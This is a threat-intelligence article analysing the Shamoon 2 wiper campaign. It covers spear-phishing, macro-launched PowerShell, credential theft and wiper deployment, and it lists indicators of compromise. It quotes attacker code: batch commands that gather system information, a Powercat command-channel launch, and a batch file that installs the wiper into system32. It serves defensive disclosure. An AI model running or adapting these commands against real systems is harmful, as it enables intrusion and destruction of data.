Analysis of new Shamoon infections
All of the initial analysis pointed to Shamoon emerging in the Middle East. This however was not the end of the story since the campaign continues to target organizations in the Middle East from a variety of verticals. Indeed reports suggested that a further 15 Shamoon incidents had been reported from public to private sector.
Rev.2 campaign
Remember the similarities to the original version comment? The code for the new revision was ‘almost’ identical to the original version, the changes included the addition of a victim’s credentials to be able to spread and execute the wiper in a large part of the environment.
In the below screenshot, we can see that the ‘old’ encoded resource names ‘PKCS12’, ‘PKCS7’ and ‘X509’ are still present in the newer variants but not used.
‘Old Shamoon’ resource names in code
A question that many of us in the industry asked ourselves of course is how were the attackers able to have the credentials from so many victims in the Middle-East region? Let’s approach this from the attacker’s site and follow the Cyber Kill Chain steps.
Reconnaissance
As an attack group, you have prepared a plan and identified the victims you want to hit and create impact or make a statement. You have gathered email-addresses, gathered other OSINT that will help prepare the first step to gather the details you need for the rest of the campaign.
Stage one starts, domains are being registered, backdoors coded and prepared for the reconnaissance phase. When all is tested, the initial attack starts: spear-phishing victims:
Spear-phishing example
The victims receive emails, for example one of the above where business proposals are being sent. The email also contains an attachment that is tempted to be opened. When opening this attachment, one example a document was used:
Document with suspicious macro
When you have to activate ‘macros’ before seeing the content, it should raise some alarm-bells. Analyzing the document, we already received confirmation on our suspicion:
Decoding of the obfuscated macro-code results in a PowerShell script that then proceeded to download a file. The analyzed file is a Trojan that is capable of gathering system information and download other tools to the system.
In other cases, we found another backdoor that is using PowerShell script to gather information from the system and writes to a temporary file. Here’s a code snippet:
cmd /a /c echo ========================== (User Name) ========================== > "%localappdata%\Microsoft\Windows\jTmpxxxxxx.txt"
cmd /a /c echo %userdomain%\%username% >>"%localappdata%\Microsoft\Windows\jTmpxxxxxx.txt" 2>
cmd /a /c
echo off
cmd /a /c
echo: >>"%localappdata%\Microsoft\Windows\jTmpxxxxxx.txt"
cmd /a /c
echo: >>"%localappdata%\Microsoft\Windows\jTmpxxxxxx.txt"
cmd /a /c
echo: >>"%localappdata%\Microsoft\Windows\jTmpxxxxxx.txt"
cmd /a /c echo ========================== (IP Config) ========================== >> "%localappdata%\Microsoft\Windows\jTmpxxxxxx.txt"
cmd /a /c ipconfig /all >>"%localappdata%\Microsoft\Windows\jTmpxxxxxx.txt"
cmd /a /c
echo off
Another interesting part was the script that is creating an instance of Mimikatz, a tool known to dump user/credentials from a computer:
CreateMimi1.Bat or CreateMimi2.Bat
When all data is gathered, the information is uploaded. To open up a command-channel, the attackers used for example a PowerShell script that is launching Powercat, a TCP/IP Swiss army knife, that works with netcat. Code example:
powershell.exe -c "Set-ExecutionPolicy -scope currentuser -ExecutionPolicy unrestricted -f
ExecutePC -p 4444 -ep"" \Microsoft\Windows\dp.ps1" powercat -c "
Weaponization
The attackers would invariably sort the credentials per victim and an indication of the IP-range and possible scale of the network. Depending on the goal of the mission, a selection of victims can be made to serve the cause defined. By having the original Shamoon code, let’s change it a bit and prepare them for the victims:
- Adding victim’s credentials – Check
- Replacing picture from flag to boy – Check
- Change resource language to Yemen Arabic – Check
- Test samples – Check
Delivery / Exploitation / Installation / C2 / Action on objectives
In these phases, the actor had already valid credentials and only needed one or two hosts in the victim’s network to use as a beach-head to upload the wipers and scripts to distribute. Since valid credentials were already in possession, no exploitation was needed.
Batch file:
@echo off
set u100=ntertmgr32.exe
set u200=service
set u800=%~dp0
copy /Y "%u800%%u100%" "%systemroot%\system32\%u100%"
start /b %systemroot%\system32\%u100% %u200%
The batch file is copying the file ‘ntertmgr32.exe’ (one of the many filenames used for the Shamoon2 variant) and copy/starts it. Once the hard-coded date has been reached, systems were being wiped – action on objectives completed.
Actor sophistication
When we look at the way this actor is executing its attack, it tells a story about their capability and skills. Their attack precision is very good; they know who and what to attack to serve in this case the mission to disrupt and leave a statement. Their focus is on the Windows platform and they are using practices well known to gather information and credentials, with no 0-days.
From a coding perspective, many colleagues in the industry already commented on the sloppy coding practices. From an OPSEC perspective aka how well are the actors able to hide details that could lead to them, we noticed that quite some details are available. Email-addresses, PDB paths and although the language identifier of almost all the samples were pointing to ‘Yemen Arabic’, we discovered a sample with a different language identifier. Was that on purpose of a slip of the actor since this was a large campaign?
Indicators
Domains:
- winappupdater.com
- update.winupdater.com
- // domain registered on 2016-11-25 by benyamin987@mail.com
- hash 146a112cb01cd4b8e06d36304f6bdf7b and bf4b07c7b4a4504c4192bd68476d63b5 were connecting to this site
Hashes:
- 146a112cb01cd4b8e06d36304f6bdf7b
- bf4b07c7b4a4504c4192bd68476d63b5
- a96d211795852b6b14e61327bbcc3473
- 1507A4FDF65952DFA439E32480F42CCF1460B96F
File locations & file names:
Collection of system information:
“%localappdata%\Microsoft\Windows\Tmp765643.txt” //where Tmp[6digits].txt is the syntax//
Filenames and locations:
- Microsoft\Windows\ccd
- Microsoft\Windows\ccd6.exe”
- Microsoft\Windows\ssc”
- Microsoft\Windows\tss.ps1″
- Microsoft\Windows\Tmp9932u1.bat”
- Microsoft\Windows\Tmp765643.txt”
- Microsoft\Windows\dp.ps1″
- Microsoft\Windows\ccd61.ps1
- Microsoft\Windows\dp.ps1″
Interesting strings in code-samples:
- F:\Projects\Bot Fresh\Release\Bot Fresh.pdb
- F:\Projects\Bot\Bot\Release\Ism.pdb
- G:\Projects\Bot\Bots\Bot5\Release\Ism.pdb
Raj Samani, CTO EMEA at Intel Security, as well as McAfee Labs, contributed to this article.